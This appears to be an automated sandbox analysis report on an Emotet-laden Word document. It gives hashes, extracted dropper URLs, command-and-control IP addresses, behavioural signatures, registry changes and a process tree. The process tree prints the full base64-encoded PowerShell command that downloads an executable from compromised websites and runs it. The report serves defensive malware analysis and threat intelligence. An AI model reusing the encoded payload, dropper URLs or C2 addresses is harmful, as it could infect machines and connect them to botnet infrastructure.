emotet | cb79f5d7b9b595abe2021e17a2891bb31e71838654cf1fb982f017b8072355de

General

Target

cb79f5d7b9b595abe2021e17a2891bb31e71838654cf1fb982f017b8072355de.doc
Size

237KB
MD5

83486e87c6820fee0477a2b4c28819aa
SHA1

92beaaaa2228fff3a7b44b1be663edc51b523c27
SHA256

cb79f5d7b9b595abe2021e17a2891bb31e71838654cf1fb982f017b8072355de
SHA512

a2d96acca3e30a9748cdfceb0a4c79c7bd16705175d0aea984dfd98ab8a9d1982ca730549856332b799b6308038029b5d8d9040668640de87a6f2cbc7fde8bd8

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://ta-behesht.ir/images/Provx00a/

exe.dropper

http://tatcogroup.ir/wp-admin/UC/

exe.dropper

http://tcpartner.ru/wp-includes/nr8/

exe.dropper

http://tepcian.utcc.ac.th/wp-admin/SquR/

exe.dropper

http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/

Extracted

Family

emotet

C2

71.126.247.90:80

98.239.119.52:80

80.86.91.91:8080

104.236.28.47:8080

47.155.214.239:443

180.92.239.110:8080

87.106.136.232:8080

76.104.80.47:80

173.16.62.227:80

92.222.216.44:8080

47.153.183.211:80

74.130.83.133:80

47.156.70.145:80

110.36.217.66:8080

160.16.215.66:8080

200.116.145.225:443

181.13.24.82:80

24.94.237.248:80

5.32.55.214:80

31.172.240.91:8080

rsa_pubkey.plain

Signatures

Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

4 1964 powersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

879.exeTRACERT.exe

pid process

1368 879.exe
916 TRACERT.exe

flow	pid	process
4	1964	powersheLL.exe

pid	process
1368	879.exe
916	TRACERT.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

879.exe

description	pid	process	target process
PID 1368 wrote to memory of 916	1368	879.exe	TRACERT.exe
PID 1368 wrote to memory of 916	1368	879.exe	TRACERT.exe
PID 1368 wrote to memory of 916	1368	879.exe	TRACERT.exe
PID 1368 wrote to memory of 916	1368	879.exe	TRACERT.exe

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\TypeLib\{31B33123-E9CE-40C0-AED2-15D6F9DCF11E}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\TypeLib\{31B33123-E9CE-40C0-AED2-15D6F9DCF11E}\2.0\HELPDIR	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{31B33123-E9CE-40C0-AED2-15D6F9DCF11E}\2.0\FLAGS	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{31B33123-E9CE-40C0-AED2-15D6F9DCF11E}\2.0\FLAGS\ = "6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{31B33123-E9CE-40C0-AED2-15D6F9DCF11E}\2.0\0	WINWORD.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE879.exeTRACERT.exe

pid process

1852 WINWORD.EXE
1852 WINWORD.EXE
1368 879.exe
916 TRACERT.exe

pid	process
1852	WINWORD.EXE
1852	WINWORD.EXE
1368	879.exe
916	TRACERT.exe

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1964	1928	powersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 1964 powersheLL.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powersheLL.exeTRACERT.exe

pid process

1964 powersheLL.exe
1964 powersheLL.exe
916 TRACERT.exe
916 TRACERT.exe
Suspicious behavior: EmotetMutantsSpam 2 IoCs

Processes:

879.exeTRACERT.exe

pid process

1368 879.exe
916 TRACERT.exe

description	pid	process
Token: SeDebugPrivilege	1964	powersheLL.exe

pid	process
1964	powersheLL.exe
1964	powersheLL.exe
916	TRACERT.exe
916	TRACERT.exe

pid	process
1368	879.exe
916	TRACERT.exe

Drops file in System32 directory 2 IoCs

Processes:

powersheLL.exe879.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe
File renamed	C:\Users\Admin\879.exe => C:\Windows\SysWOW64\TRACERT\TRACERT.exe	879.exe

Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1852 WINWORD.EXE

pid	process
1852	WINWORD.EXE

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cb79f5d7b9b595abe2021e17a2891bb31e71838654cf1fb982f017b8072355de.doc"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:1852

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AHEAaABsAHkAJwA7ACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBhAHoAYwB5AGoAdABiAHQAYgBoAHcAagArACcALgBlAHgAZQAnADsAJABXAGkAaABpAGoAawBiAGQAbABsAHIAPQAnAFYAbQBuAHEAcQBrAG0AaABrAGYAdgB4ACcAOwAkAEsAcQB2AGYAbwB4AHkAcABlAHoAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYwBMAEkARQBOAFQAOwAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAPQAnAGgAdAB0AHAAOgAvAC8AdABhAC0AYgBlAGgAZQBzAGgAdAAuAGkAcgAvAGkAbQBhAGcAZQBzAC8AUAByAG8AdgB4ADAAMABhAC8AKgBoAHQAdABwADoALwAvAHQAYQB0AGMAbwBnAHIAbwB1AHAALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwBVAEMALwAqAGgAdAB0AHAAOgAvAC8AdABjAHAAYQByAHQAbgBlAHIALgByAHUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBuAHIAOAAvACoAaAB0AHQAcAA6AC8ALwB0AGUAcABjAGkAYQBuAC4AdQB0AGMAYwAuAGEAYwAuAHQAaAAvAHcAcAAtAGEAZABtAGkAbgAvAFMAcQB1AFIALwAqAGgAdAB0AHAAOgAvAC8AbwB1AHIAcAByAG8AZAB1AGMAdAByAGUAdgBpAGUAdwAuAGkAbgAvAHAAbwBrAGoAYgBnADcANAA2AGkAaAByAHQAcgAvAGEAMQBrAHoAdwBjAC8AJwAuACIAcwBQAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAHIAeQBuAGkAaABxAHgAYwBxAG4AcAA9ACcASABrAGQAawB6AGgAegBrAGMAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGgAaQBwAHMAdgB3AHAAIABpAG4AIAAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAKQB7AHQAcgB5AHsAJABLAHEAdgBmAG8AeAB5AHAAZQB6AC4AIgBkAE8AdwBuAEwAYABPAGAAQQBEAEYASQBsAGUAIgAoACQAWABoAGkAcABzAHYAdwBwACwAIAAkAEQAagBhAGEAbwB1AHMAdwBuAGIAcgBoAHkAKQA7ACQASgBtAGMAbABrAGoAcQBwAD0AJwBYAGkAaQBhAHgAawB3AGMAYQB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADMANwA0ADMAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAFQAZQAiACgAJABEAGoAYQBhAG8AdQBzAHcAbgBiAHIAaAB5ACkAOwAkAEMAawB4AHMAdQBjAG8AaABzAHQAYwBoAGwAPQAnAEMAZwB4AGEAdgB4AGYAYgByACcAOwBiAHIAZQBhAGsAOwAkAFoAZwBvAHYAcgBoAGoAbQA9ACcATQBxAHYAbgB4AGYAZgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AbAByAHoAdAB6AHYAZQBjAHcAagBnAD0AJwBDAGkAcwB3AGMAdgB4AHkAegBlAHEAcQAnAA==
1⤵
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
PID:1964

C:\Users\Admin\879.exe
C:\Users\Admin\879.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
PID:1368

C:\Windows\SysWOW64\TRACERT\TRACERT.exe
"C:\Windows\SysWOW64\TRACERT\TRACERT.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: EmotetMutantsSpam
PID:916

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\879.exe

Download Submit
C:\Users\Admin\879.exe

Download Submit
C:\Windows\SysWOW64\TRACERT\TRACERT.exe

Download Submit
memory/916-11-0x0000000000360000-0x000000000036C000-memory.dmp

Filesize
48KB

Download
memory/916-12-0x0000000000400000-0x00000000004F7000-memory.dmp

Filesize
988KB

Download
memory/1368-8-0x0000000000270000-0x000000000027C000-memory.dmp

Filesize
48KB

Download
memory/1368-9-0x0000000000400000-0x00000000004F7000-memory.dmp

Filesize
988KB

Download
memory/1852-2-0x0000000008920000-0x0000000008924000-memory.dmp

Filesize
16KB

Download
memory/1852-3-0x0000000007000000-0x0000000007200000-memory.dmp

Filesize
2.0MB

Download
memory/1852-4-0x000000000A9F0000-0x000000000A9F4000-memory.dmp

Filesize
16KB

Download
memory/1852-5-0x000000000BE70000-0x000000000BE74000-memory.dmp

Filesize
16KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads